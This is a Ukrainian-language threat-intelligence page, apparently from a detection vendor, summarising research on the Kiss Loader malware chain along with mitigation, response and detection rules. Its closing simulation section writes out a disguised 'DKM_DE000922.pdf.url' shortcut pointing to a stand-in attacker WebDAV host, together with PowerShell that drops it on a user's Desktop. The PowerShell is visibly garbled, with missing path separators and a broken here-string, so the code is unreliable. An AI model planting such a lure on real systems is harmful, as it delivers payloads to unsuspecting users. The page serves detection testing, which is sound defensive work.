Коли зловмисне ПЗ відповідає: реальний інтерактив зі зловмисником під час аналізу Kiss Loader
Detection stack
- AIDR
- Alert
- ETL
- Query
Резюме
Дослідження від Центру Безпеки G DATA розглядає нововиявлений завантажувач під назвою Kiss Loader. Стаття досліджує нововиявлений завантажувач під назвою Kiss Loader, який поширюється через Windows ярлик, що вказує на WebDAV-репозиторій, відкрите через тунель TryCloudflare. Після запуску завантажувач розшифровує шеллкод, створений за допомогою Donut, отримує корисні навантаження, такі як VenomRAT та компонент Kryptik, і виконує їх через вприскування за методом Early Bird APC в explorer.exe. Під час аналізу дослідник зазнав прямої взаємодії з оператором шкідливого ПЗ через вікно Блокнота, що підтвердило використання методу вприскування Early Bird. Випадок підкреслює швидку еволюцію інструменту та необхідність сильної ізоляції при обробці активного шкідливого ПЗ.
Дослідження
Дослідники активували початковий ярлик у контрольованій лабораторії та простежили ланцюжок виконання через WSH-скрипт, компонент JScript, пакетні файли та завантажувач на основі Python. Вони підтвердили використання шеллкода, створеного за допомогою Donut, витягли вбудовані корисні навантаження та задокументували остаточний метод впуску, який ставить у чергу APC у призупинений explorer.exe процес. Під час сесії команда захопила детальний вихід часу виконання і повідомлення розробника, залишені в потоці шкідливого ПЗ. Короткий обмін в реальному часі з оператором додатково підтвердив як техніку, так і активний стан розробки завантажувача.
Пом’якшення
Організації повинні обмежити або перевіряти трафік WebDAV, доставлений через публічні тунельні платформи, такі як TryCloudflare, відключити автоматичне виконання .url ярликів, а також застосовувати суворий контроль виконання скриптів і пакетних файлів у шляхах автозавантаження, доступних користувачу. Захист кінцевої точки повинен виявляти поведінку ін’єкції Early Bird APC і контролювати призупинені процеси, які отримують у черзі APC. Списки дозволених застосунків також повинні бути актуальними для блокування невідомих завантажувачів Python і шеллкодів на базі Donut.
Реагування
Якщо виявлено активність Kiss Loader, негайно ізолюйте кінцеву точку, припиніть будь-які підозрілі explorer.exe процеси, запущені в призупиненому стані, і захопіть пам’ять для судово-експертного огляду. Розслідувачі повинні ідентифікувати та заблокувати пов’язану інфраструктуру WebDAV, сканувати хост на наявність VenomRAT, Kryptik та будь-яких додаткових скинутих корисних навантажень, а також змінити потенційно скомпрометовані облікові дані. Після цього повинен бути переглянутий журнал для інших спроб вторгнення, і правила виявлення мають бути оновлені з усіма новими спостережуваними показниками.
Потік атаки
Виявлення
Можливе зловживання диспетчером URI Search / Search-MS (через cmdline)
Переглянути
Створено файл ярлика Інтернету з подвійним розширенням (через file_event)
Переглянути
LOLBAS WScript / CScript (через process_creation)
Переглянути
Індикатори компрометації (HashSha256) для виявлення: Коли шкідливе ПЗ відповідає: Взаємодія в реальному часі з актором загрози під час аналізу Kiss Loader
Переглянути
Ін’єкція Early Bird APC в Explorer.exe [Створення процесу Windows]
Переглянути
Спроба початкового доступу через ярлики WebDAV [Подія файлу Windows]
Переглянути
Виконання симуляції
Передумова: має бути пройдена перевірка телеметрії та базової лінії Pre-flight.
-
Опис атаки та команди:
Атакуючий з обмеженим доступом до робочої станції жертви хоче закріпитися для латерального руху. Вони створюють зловмисний ярлик Інтернету Windows під назвою DKM_DE000922.pdf.url який вказує на зловмисний спільний WebDAV-доступ (http://malicious.example.com/webdav/evil.pdf). Коли користувач двічі клацає ярлик, система автоматично намагається змонтувати WebDAV-ресурс, змушуючи жертву завантажити корисне навантаження без виконання традиційного двійкового файлу. Створення цього ярлика генерує подію створення файлу, що відповідає правилу виявлення.
[InternetShortcut] URL=http://malicious.example.com/webdav/evil.pdf IconFile=%SystemRoot%system32shell32.dll IconIndex=0 “@powershell # Шлях, куди буде збережено ярлик (наприклад, на Робочому столі користувача) $maliciousPath = "$env:USERPROFILEDesktopDKM_DE000922.pdf.url" # Вміст зловмисного файлу .url, що вказує на WebDAV-доступ $maliciousContent = @"# Записати файл – ця дія повинна викликати правило виявлення Set-Content -Path $maliciousPath -Value $maliciousContent -Encoding ASCII -
Скрипт тесту на регресію: Скрипт нижче відтворює точні кроки, необхідні для генерації телеметрії, що викликає тригер.
[InternetShortcut] URL=http://malicious.example.com/webdav/evil.pdf IconFile=%SystemRoot%system32shell32.dll IconIndex=0 “@powershell # --------------------------------------------------------- # Тест на регресію – Виклик правила Sigma для файлів WebDAV .url # --------------------------------------------------------- # 1. Визначити цільове місце (робочий стіл для поточного користувача) $targetFile = "$env:USERPROFILEDesktopDKM_DE000922.pdf.url" # 2. Зібрати вміст зловмисного ярлика $urlPayload = @"# 3. Записати ярлик (це викличе подію створення файлу) Set-Content -Path $targetFile -Value $urlPayload -Encoding ASCII Write-Host "Створено зловмисний .url ярлик в $targetFile" -
Команди очищення: Видалити зловмисний ярлик після перевірки.
powershell $maliciousPath = "$env:USERPROFILEDesktopDKM_DE000922.pdf.url" if (Test-Path $maliciousPath) { Remove-Item -Path $maliciousPath -Force Write-Host "Зловмисний ярлик було видалено." } else { Write-Host "Зловмисний ярлик не знайдено; нічого очищати." }